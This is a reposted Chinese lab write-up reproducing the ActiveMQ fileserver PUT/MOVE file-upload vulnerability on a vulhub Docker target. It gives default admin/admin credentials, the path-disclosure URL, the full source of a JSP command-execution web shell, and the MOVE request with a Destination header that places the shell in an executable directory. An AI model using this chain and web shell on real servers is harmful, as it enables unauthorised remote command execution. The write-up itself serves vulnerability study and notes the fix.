标签:CVE admin 上传 漏洞 jsp PUT 2016 ActiveMq 目录
0x00 实验环境
攻击机:Win 10
靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场)
0x01 影响版本
未禁用PUT、MOVE等高危方法的ActiveMq版本(可自行尝试)
0x02 漏洞复现
(1)实验环境:docker运行的vulhub漏洞环境首先,可直接访问到页面的显示为:
(2)使用默认弱口令:admin/admin即可登录至后台:(注:没有密码无法写shell)
(3)访问目录信息泄露页面可获取ActiveMq安装目录:
http://ip:8161/admin/test/systemProperties.jsp
(4)在/fileserver/路径下可使用PUT方法直接上传小马:
上传成功,可直接写入小马:
<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %>
上传成功:
(5)由于此目录并不解析,故需要将小马上传至别的可解析的目录下,在请求http://X.X.X.X:8161/fileserver/2.txt的页面进行抓包,然后在请求包内增加重定向的指令:
Destination:file:///opt/activemq/webapps/api/test.jsp
(6)使用MOVE方法移动至别的目录下,移动成功将返回204:
靶机内也多了一个——2.jsp文件
(7)即可执行任意命令
0x03 实验原理
详细分析请查看:
https://www.secpulse.com/archives/60064.html
个人总结:ActiveMQ 中的 FileServer 服务允许用户通过 HTTP PUT 方法上传文件到指定目录,需要禁用危险的HTTP方法
标签:CVE,admin,上传,漏洞,jsp,PUT,2016,ActiveMq,目录 来源: https://www.cnblogs.com/cute-puli/p/14395931.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。